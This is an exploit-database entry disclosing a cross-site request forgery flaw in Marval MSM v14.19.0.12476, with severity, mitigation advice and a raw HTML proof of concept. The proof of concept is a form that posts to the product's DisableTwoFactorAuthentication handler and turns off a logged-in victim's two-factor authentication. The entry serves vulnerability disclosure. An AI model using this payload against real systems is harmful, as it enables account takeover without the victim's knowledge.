Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)

vendor:

MSM

by:

Momen Eldawakhly (Cyber Guy)

8.8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: MSM

Affected Version From: v14.19.0.12476

Affected Version To: v14.19.0.12476

Patch Exists: NO

Related CWE:

CPE: MSM

Metasploit:

Other Scripts:

Platforms Tested: Windows

2022

Marval MSM v14.19.0.12476 – Cross-Site Request Forgery (CSRF)

Marval MSM v14.19.0.12476 is vulnerable to Cross-Site Request Forgery (CSRF). An attacker can craft a malicious HTML page that contains a form with an action pointing to the vulnerable application. When a logged-in user visits the malicious page, the form will be automatically submitted, allowing the attacker to perform actions with the same privileges as the user.

Mitigation:

Implementing a CSRF token in the application can help mitigate this vulnerability. Additionally, the application should also validate the HTTP Referer header to ensure that the request is coming from a trusted source.

Source

Exploit-DB raw data:

# Exploit Title: Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)
# Date: 27/5/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.marvalnorthamerica.com/
# Software Link: https://www.marvalnorthamerica.com/
# Version: v14.19.0.12476
# Tested on: Windows
# PoCs: https://drive.google.com/drive/folders/1Zy5Oa-maLo0ACfLz90uvxqxwG18DwAZY
# 2FA Bypass:

<html>

  <body>
    <form action="https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptHandler.ashx?method=DisableTwoFactorAuthentication&classPath=%2FMSM_Test%2FRFP%2FForms%2FProfile.aspx&classMode=WXr8G2r3eh3984wn3YQvtybzSUW%2B955Uiq5AACvfimwA%2FNZHYRFm8%2Bgidv5CcNfjtLsElRbK%2FRmwvfE9UfeyD6DseGEe5eZGWB32FOJrhdcEh7oNUSSO9Q%3D%3D" method="POST" enctype="text/plain">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>